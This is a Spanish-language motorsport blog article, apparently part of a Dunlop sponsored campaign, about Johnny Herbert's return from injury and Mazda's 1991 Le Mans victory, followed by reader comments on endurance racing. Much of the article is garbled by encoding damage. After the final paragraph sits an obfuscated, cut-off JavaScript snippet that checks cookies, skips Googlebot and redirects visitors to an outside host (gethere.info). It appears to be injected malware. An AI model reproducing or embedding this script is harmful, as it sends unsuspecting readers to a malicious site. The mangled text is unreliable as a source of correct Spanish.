CorazA?n de carbono

Master
2013-03-01-mazda-1
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1991 24 Hours Le Mans Le Mans, France. June 1991 Mazda World Copyright - LAT Photographic

Como si de un ave fAi??nix se tratara, Niki Lauda regresA? con todo tras recuperarse de las terribles heridas sufridas en NA?rburgring en 1976, forjA?ndose un nombre entre las leyendas de la FA?rmula 1.

Casi un cuarto de siglo despuAi??s, otro accidente devastador que devino en una recuperaciA?n milagrosa, permanece menos instalado en el recuerdo de los fanA?ticos del automovilismo.

Mientras que muchos de sus compaAi??eros y rivales reciAi??n llegados a la F1 entrenaban en la pretemporada para debutar en el campeonato de 1989, Johnny Herbert pasaba ese mismo tiempo bien dentro de un quirA?fano o bien en sesiones de rehabilitaciA?n, luchando por salir adelante y lo mA?s entero posible del catastrA?fico accidente sufrido a bordo de un FA?rmula 3000 en agosto de 1988.

Apenas seis meses despuAi??sAi??de que los cirujanos se debatAi??an sobre amputarle o no el pie izquierdo, Herbert consiguiA? cruzar cuarto la bandera a cuadros en su debut en la F1. Ese dAi??a, el calor sofocante de Rio de Janeiro era la menor de lasAi??preocupaciones para el piloto inglAi??s. Fragmentos de fibra de carbono continuaban surgiendo de las heridas sufridas en su pulverizado tobillo y en su pie. A una hazaAi??a estrictamente deportiva se le unAi??a una tremenda bA?squedaAi??del espAi??ritu humano por superarse.

Sin embargo, aquello no era mA?s que una ilusiA?n. Las maniobras de frenado de Herbert con los Benetton B188 y B189 no eran todo lo efectivas que se esperaban y, de repente, pareciA? que su trayectoria en la F1 terminaba, paradA?jicamente, cuando reciAi??n habAi??a comenzado.

Un cameo en el Gran Premio de BAi??lgica, como sustituto en el equipo Tyrrel, no le permitiA? cambiar la sensaciA?n de final anunciado en el ambiente, que previo al accidente veAi??a a Herbert como al sucesor de Jim Clark.

Su salvaciA?n llegA? eventualmente de la mano de la F3000 y las categorAi??as sport japonesas, antes de recibir el llamado de Lotus para sustituir al accidentado Martin Donnelly, en el otoAi??o europeo de 1990.

La prueba definitiva para saber si Herbert podAi??a resistir los esfuerzos fAi??sicos de carreras de alta exigencia se produjo en 1991 en Le Mans. Un aAi??o antes, el equipo Mazda habAi??a estado buscando nuevos talentos y Herbert se ajustaba a la perfecciA?n a lo que buscaban.

ai???SabAi??amos que necesitA?bamos conductores jA?venes, y David Kennedy, a travAi??s de sus contactos, presentA? a Johnny Herbert y a Bertrand Gachot”, recuerda el piloto de Mazdaspeed y pieza clave del Ai??xito de Mazda, Pierre DieudonnAi??. “Mazda conocAi??a a Volker Weidler gracias a sus hazaAi??as en JapA?n, por lo que pronto tenAi??amos a los pilotos jA?venes que buscA?bamos y todo parecAi??a resuelto”.

Pero todavAi??a habAi??a mucha rebabas para limar en este trAi??o de jA?venes que, por otra parte, tenAi??an en los tres casos ambiciones de llegar y hacerse un nombre en la mA?xima categorAi??a de monopostos.

ai???Eran pilotos inmaduros cuando fueron reclutados por el equipo de Le Mans en 1990ai???, recuerda el belga DieudonnAi??. ai???ConseguAi??an hacer vueltas rA?pidas, pero tambiAi??n eran bastante inconsistentes. Pero cuando llegA? el tiempo de Le Mans 1991, fueron capaces de hacer la carrera sin un solo error. Crecieron rA?pidamente y se dieron cuenta que en Le Mans habAi??a que ser inteligente, no sA?lo ser rA?pidoai???.

La fiabilidad del ensordecedor 787B rotativo, junto con el ritmo de Herbert, Gachot y Weidler fueron claves para Mazda, que se convirtiA? en el primer fabricante japonAi??s (y A?nico hasta ahora) en ganar las 24 Horas, pero igual de importante lo fue la relaciA?n tAi??cnica del equipo Mazda ORECA con su proveedor de neumA?ticos. ai???Mazdaspeed siempre utilizaba productos Dunlop y su conexiA?n con la empresa era fuerteai???, recuerda DieudonnAi??. ai???AsAi?? que todo era parte de esa relaciA?n fiel, que permite confiar en el desarrollo y no tener ningA?n tipo de preocupaciA?n al entrar en la carrera. Eran un activo clave para nosotrosai???.

ai???Creo que una de las principales razones por las que Johnny decidiA? sumarse al equipo Mazda y competir en Le Mans despuAi??s de sus problemas previos en la F1 fue que querAi??a demostrarle al mundo que estaba de nuevo en perfecta forma despuAi??s de su accidente,ai??? dice DieudonnAi??. ai???DespuAi??s de todo, si puedes frenar con la suficiente consistencia y efectividad en tus turnos de manejo durante las 24 horas en un Mazda del Grupo C, entonces puedes asegurarte que lo harA?s en un par de horas en un monoplaza de F1″.

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ai???Cuando hacAi??amos los cambios de turnos en el box, ver sus pies era horrible. AA?n tenAi??a lesiones y se podAi??a ver incluso pequeAi??os trozos de carbono que salAi??an de su piel. TodavAi??a tenAi??a mucho dolor. Todo el mundo veAi??a al bueno de Johnny feliz, y realmente era asAi??, pero el muchacho disimulaba un dolor tan grandeai??i?? y hay que decir que Ai??l hizo frente a todo eso de manera increAi??ble. Era un tipo sA?per resistente y realmente nos merecAi??a el mayor de los respetosai???.

Herbert sufriA? deshidrataciA?n en el tramo final de Le Mans en el 91, probablemente a causa de no seguir del todo las indicaciones del mAi??dico y fisioterapeuta que DieudonnAi?? le proporcionA?.

ai???Estaba tan concentrado que al final, cuando lideraba la prueba, querAi??a evitar otro cambio de conductor, por lo que hizo un relevo largo, que finalmente lo destruyA? fAi??sicamente. DespuAi??s parecAi??a un fantasma y fue triste que no pudiese subir al podiumai???, recuerda DieudonnAi??.

Muchos otros ai???fantasmasai??? habAi??an sido enterrados por Herbert ese fin de semana en La Sarthe, y aunque todavAi??a quedaba un largo y doloroso camino hacia su primera victoria en la F1 en Silverstone en 1995, ya nada podAi??a ser tan terrible como lo que dejaba atrA?s.

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Este relato de la hazaAi??a de Johnny Herbert fue escritoAi??porAi??Sam SmithAi??y hace parte de la campaAi??a ai???Great Fightbacksai??? desarrollada por la marca de neumA?ticos Dunlop, en la que se recuerdan diez grandes momentos en la historia del automovilismo, protagonizadas obviamente por autos calzados con neumA?ticos de esta marca.

Los interesados tienen la oportunidad de votar su historia favorita enAi??www.greatfightbacks.comAi??desde el 21 de enero de 2016 hasta el 29 de febrero. Durante las prA?ximas semanas, Dunlop seguirA?Ai??desvelando las diez historias por orden cronolA?gico.var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== 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11 Comentarios, RSS

  1. mor 24/02/2016 @ 12:19 pm

    No lo tenía al Yoni como un superjirouuuuuuuu…………mas bien como uno mas del montón. Pero por suerte para eso esta VDR, para enseñarnos……

  2. MARIO 25/02/2016 @ 11:38 am

    Esta notas me refrescan que en Le Mans no término con los 917 o los Gt 40, generalmente se toca el l tema de esa carrera en particular y sus pilotos…, Siffert, Pedro Rodriguez, Redmann, etc. sucede lo mismo en los foros.
    Pero olvido/damos autos como Mazda de la nota…, el Peugeot 905, motor V 10, ganador 1993, Lola T 616, (Mazda) o el Jaguar JR 12, Violeta, etc. del cual guardo una gorrita con la propaganda de Silk Cut, simplemente quería en forma totalmente desordenada (como corresponde) y parcial recordar algunos de estos autos de carrera de la endurance. La nota es excelente sirve para que reeveamos la historia de esa competencia, cosa que hago en forma desordenada.

  3. Kuve 25/02/2016 @ 12:21 pm

    La ultima foto de Herbert es en 2011 cuand se cumplio los 20 años de la victoria, giro con el Mazda tanto en el circuito como en el centro de Le Mans.

  4. Beppe Viola 25/02/2016 @ 5:11 pm

    Esta nota da temas para desarrollar en gran cantidad,…. aprovecho la puntita mostrada por Mario para comentar que, si bien el periodo indicado por el (fines ’60’s inicios 70’s) puede ser considerado la Golden Era, Le Mans y el Endurance en general tuvieron muchísimos periodos históricos notables…. Los Bentley boys de los ’30’s, la victoria de Chinetti con sus 23 horas de un saque, los años ’50’s con la lucha Mercedes, Jaguar Ferrari, los monstruosos Maserati, la aparición de los Porsche, Abarth, Alfa Romeo, las Rover a turbina, las Ferrari P’s … los grandísimos años de los grupos C, hasta en los momentos de crisis post Ecclestone (los del periodo de esta Mazda) y hasta llegar hasta la, para mi, “nueva era dorada” de estos últimos años con la tecnologia y la competición a niveles altísimos deja sentado que el Endurance es la frontera máxima del motorsport…
    Herbert no es un héroe, tampoco fue uno del montón,…. fue un buen piloto que se pegó un gran palo, como muchos otros, y que con perseverancia volvió a la pista con buenos resultados, y que no desfiguró, al contrario de otros, en el impiedoso confronto con Kaiser Schumi… Lo he visto ganar en Monza en el periodo Benetton y encima es un tipo simpatico, ….

  5. Güilbeis 25/02/2016 @ 7:06 pm

    A mi me atrajo el Indice de Performance con los pequeños y aerdinámicos autos franceses de varias marcas y motorizaciones con sus carrocerías supuestamente eficientes y todas bleu, que quedaban temblando en las rectas cuando eran pasados a mil por los grandotes. Qué lindos!

  6. Beppe Viola 26/02/2016 @ 6:16 am

    Güilbeis: a proposito de ese periodo…. hace un par de anios vi la Panhard LeMans y no podia creer lo chiquita que era, con esas aletas ridiculas … (notar el extractor aerodinamico trasero, 13 anios antes de Colin Chapman………
    http://www.autodrome.fr/cd_panhard_le_mans_64_english.htm.
    El Nardi Bisiluro en cambio era tan liviano que fue sacado de pista (en LM ’55 o ’56) por el desplazamiento de aire provocado por una Jaguar D que lo estaba superando….

    • Pablo Felipe Richetti 26/02/2016 @ 9:44 am

      Glorioso ese Panhard, vi otros modelos en Mulhouse, pero a este no lo tenía…, gracias por el adjunto.
      En cuanto a Johnny, cuando tuvo de compañero a Norberto Fontana en Sauber, solo 4 carreras, le escondía los datos de la telemetria por miedo a que el pibe le pase el trapo…, después vino Morbidelli con el apoyo de cavallino y fue otra historia.

      • Güilbeis 26/02/2016 @ 1:08 pm

        Hubo un CD (por Charles Deutsch) posterior, muy parecido pero no más con mecánica Panhard sino con un Peugeot 204 transversal central, el CD-SP66. Ese hermoso auto está en el Museo de La Sarthe.

  7. morgan. 26/02/2016 @ 8:59 am

    lo bueno de esta carrera es que siempre hay autos para destacar……..a mi no me pregunten porque pero el Sauber Mercedes C9 me la pone gomosa mal……..me vuelve loco. Y la lista de los que me gustan puede ser interminable……..

  8. Pierre menard 28/02/2016 @ 1:20 am

    A los que les intersen la 24 Horas de Le Mans , vean el documental journey to Le Mans , no tiene desperdicio es una suerte de docureality sobre e! Equipo Jota sport en la edición 2013 , esta en Netflix y en Youtube

  9. Jan Lammers 03/03/2016 @ 4:27 am

    Herbert fue coequiper de Fontana en Sauber a comienzos de los 90.
    Si mal no recuerdo, y a pesar de tener más pergaminos y presupuesto, estaba muy parejo con Norberto, aunque fueron pocas carreras como para que el argentino se adaptara.
    Y Fontana le ganaba a Ralph Schumacher en la F3 alemana.
    Cuantos pilotos no llegaron por falta de apoyo y tiempo.
    Jan Lammers es otro que ganó Le Mans con Jaguar manejando mas de 11 horas, el BTCC con Volvo rural 850 y en la Procar ganó 2 carreras, nada menos que a Piquet, Reutemann, Fittipaldi, Laffite y compañía.

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